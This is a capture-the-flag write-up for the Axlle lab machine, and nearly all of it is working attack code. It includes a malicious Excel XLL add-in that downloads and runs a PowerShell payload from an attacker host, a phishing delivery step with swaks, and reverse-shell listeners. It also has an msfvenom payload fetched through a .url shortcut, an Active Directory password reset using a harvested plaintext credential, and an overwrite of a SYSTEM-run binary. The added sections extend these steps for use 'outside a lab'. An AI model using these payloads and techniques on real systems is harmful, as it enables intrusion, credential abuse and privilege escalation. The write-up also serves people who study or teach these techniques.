Axlle HTB
by kpax
- Initial Access - gideon.hamill
- Lateral Movement to dallon.matrix
- Shell as dallon.matrix
- Shell as jacob.greeny
Initial Access - gideon.hamill
Create a DLL and compile it for Windows with the .xll extension (an XLL is a DLL add-in that Excel loads; Excel calls the exported xlAutoOpen when the add-in is opened, so the payload goes there):
#include <windows.h>
#include <stdlib.h>

BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        break;
    }
    return TRUE;
}

/* Excel calls xlAutoOpen when the add-in loads; it must return 1 on success. */
__declspec(dllexport) int WINAPI xlAutoOpen(void)
{
    system("cmd.exe /c powershell IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2:8000/conpty.ps1')");
    return 1;
}
Compile it as a shared library with the mingw cross-compiler:
x86_64-w64-mingw32-gcc invoice.c -o invoice.xll -shared
Listen for the ConPTY shell (stty raw -echo keeps the local terminal raw, and the leading stty size sends the terminal dimensions the client reads on connect):
stty raw -echo; (stty size; cat) | nc -lvnp 9001
Send it as an attachment with swaks to the accounts mailbox (-s is the target's SMTP server):
swaks -t accounts@axlle.htb -f me@test.com --attach invoice.xll -p 25 --header "Subject: invoice" --body "OpenMe" -s 10.129.231.60
Once the shell lands, map the attacker's SMB share as a PSDrive for easy copying of files:
new-psdrive -name "myfiles" -psprovider "filesystem" -root "\\10.10.14.2\test"
Lateral Movement to dallon.matrix
Read dallon.matrix's mail in the hMailServer data directory: C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
Build an msfvenom executable that pulls the same ConPTY stager:
msfvenom -a x64 --platform Windows -p windows/x64/exec CMD="cmd.exe /c powershell IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2:8000/conpty.ps1')" -f exe -o evil.exe
Create a file called shortcut.url with the following contents; the URL points at evil.exe on the attacker's SMB share, so whoever opens the shortcut fetches and runs the executable:
[InternetShortcut]
URL=file:////10.10.14.2/test/evil.exe
Listen for conpty shell
stty raw -echo; (stty size; cat) | nc -lvnp 9001
From the gideon.hamill shell, drop shortcut.url into c:\inetpub\testing; when dallon.matrix opens it, evil.exe runs as him:
curl http://10.10.14.2:8000/shortcut.url -o shortcut.url
Shell as dallon.matrix
Create a new PS-Drive for easy copying of files
new-psdrive -name "myfiles" -psprovider "filesystem" -root "\\10.10.14.2\test"
Copy PowerView.ps1 over and dot-source it:
copy myfiles:PowerView.ps1 .
. .\PowerView.ps1
Reset jacob.greeny's password using dallon.matrix's credential:
$SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('axlle.htb\dallon.matrix', $SecPassword)
$UserPassword = ConvertTo-SecureString 'P@ssword123' -AsPlainText -Force
Set-DomainUserPassword -Identity jacob.greeny -AccountPassword $UserPassword -Credential $Cred
Create a PSSession as jacob.greeny and launch the stager through it:
$SecPassword = ConvertTo-SecureString 'P@ssword123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('axlle.htb\jacob.greeny', $SecPassword)
$session = New-PSSession -ComputerName MAINFRAME.AXLLE.HTB -Credential $Cred
Invoke-Command -Session $session -ScriptBlock {IEX ((new-object net.webclient).downloadstring('http://10.10.14.2:8000/conpty.ps1'))}
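The reset above works only because dallon.matrix holds a password-reset right over jacob.greeny. The following is an added example (not part of the original write-up) that puts the same reset together with the precondition check a practitioner would run first and a verification step afterwards. It assumes PowerView.ps1 is already dot-sourced in the dallon.matrix shell, as in the steps above, and reuses the account names and passwords from this page; the group lookup covers direct memberships only.

```powershell
# Added example, not from the original write-up. Assumes PowerView.ps1 is dot-sourced.
$Target  = 'jacob.greeny'
$Trustee = 'dallon.matrix'

# 1. Precondition: find ACEs on the target that grant the trustee (or one of his direct
#    groups) a password reset. GenericAll, WriteDacl/WriteOwner or the
#    User-Force-Change-Password extended right are the ones that make the reset succeed.
$TrusteeSids  = @(ConvertTo-SID $Trustee)
$TrusteeSids += Get-DomainGroup -MemberIdentity $Trustee | ForEach-Object { $_.objectsid }

$Aces = Get-DomainObjectAcl -Identity $Target -ResolveGUIDs | Where-Object {
    ($TrusteeSids -contains "$($_.SecurityIdentifier)") -and (
        $_.ActiveDirectoryRights -match 'GenericAll|WriteDacl|WriteOwner' -or
        ($_.ActiveDirectoryRights -match 'ExtendedRight' -and
         $_.ObjectAceType -in 'User-Force-Change-Password', 'All')
    )
}
if (-not $Aces) { throw "$Trustee has no reset right over $Target; stop here" }
$Aces | Select-Object ObjectAceType, ActiveDirectoryRights, SecurityIdentifier | Format-Table

# 2. Reset the password with dallon.matrix's credential (same call as the write-up).
$DallonCred  = New-Object System.Management.Automation.PSCredential(
    "axlle.htb\$Trustee", (ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force))
$NewPassword = ConvertTo-SecureString 'P@ssword123' -AsPlainText -Force
Set-DomainUserPassword -Identity $Target -AccountPassword $NewPassword -Credential $DallonCred

# 3. Verify before using it: bind to the domain as jacob.greeny and read pwdlastset,
#    which must now be a fresh timestamp.
$JacobCred = New-Object System.Management.Automation.PSCredential("axlle.htb\$Target", $NewPassword)
Get-DomainUser -Identity $Target -Credential $JacobCred -Properties samaccountname, pwdlastset |
    Format-List
```

A password reset is destructive and noisy (it logs event 4724 on the DC and locks the real user out), so outside a lab the check in step 1 is also what tells you whether a quieter path such as a shadow credential or targeted Kerberoast is available instead.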
Shell as jacob.greeny
Create a new PS-Drive for easy copying of files
new-psdrive -name "myfiles" -psprovider "filesystem" -root "\\10.10.14.2\test"
Overwrite standalonerunner.exe, which is run as SYSTEM according to [[50 - loot#Keyboard Translation Readme.md]]
cd "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64"
copy myfiles:evil.exe .\standalonerunner.exe
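The copy above assumes jacob.greeny can write that binary and gives no feedback if it silently fails. As an added example (not from the original write-up), the same overwrite with the checks a practitioner would add: confirm a write ACE for the current user, keep a backup of the original so the binary can be restored, and prove the file on disk actually changed. It assumes the myfiles: PSDrive from the step above and that evil.exe is the msfvenom payload staged on the attacker share.

```powershell
# Added example, not from the original write-up. Assumes myfiles: is mapped to the attacker share.
$Dir    = 'C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64'
$Target = Join-Path $Dir 'standalonerunner.exe'

# Names (user plus groups) of the current token, for matching against ACL entries.
function Get-MyPrincipalNames {
    $Me = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $Names = @($Me.Name)
    foreach ($g in $Me.Groups) {
        try { $Names += $g.Translate([System.Security.Principal.NTAccount]).Value } catch { }
    }
    $Names
}

# 1. Check for an explicit Allow ACE that lets us write the file; fall back to the
#    directory ACL, since a writable directory also lets us replace the file.
$MyNames  = Get-MyPrincipalNames
$Writable = (Get-Acl $Target).Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and
    $MyNames -contains $_.IdentityReference.Value -and
    $_.FileSystemRights -match 'FullControl|Modify|Write'
}
if (-not $Writable) {
    Write-Warning "No write ACE for us on $Target; directory ACL:"
    (Get-Acl $Dir).Access | Format-Table IdentityReference, FileSystemRights, AccessControlType
}

# 2. Back up the original before touching it so the box (or a client host) can be restored.
Copy-Item $Target (Join-Path $env:TEMP 'standalonerunner.exe.bak') -Force
$Before = (Get-FileHash $Target -Algorithm SHA256).Hash

# 3. Overwrite with the payload and confirm the content changed; Copy-Item throws if denied.
Copy-Item 'myfiles:\evil.exe' $Target -Force
$After = (Get-FileHash $Target -Algorithm SHA256).Hash
if ($Before -eq $After) { throw 'Overwrite failed: file hash unchanged' }
"Replaced $Target ($Before -> $After); keep the nc listener on 9001 up for the SYSTEM shell."
```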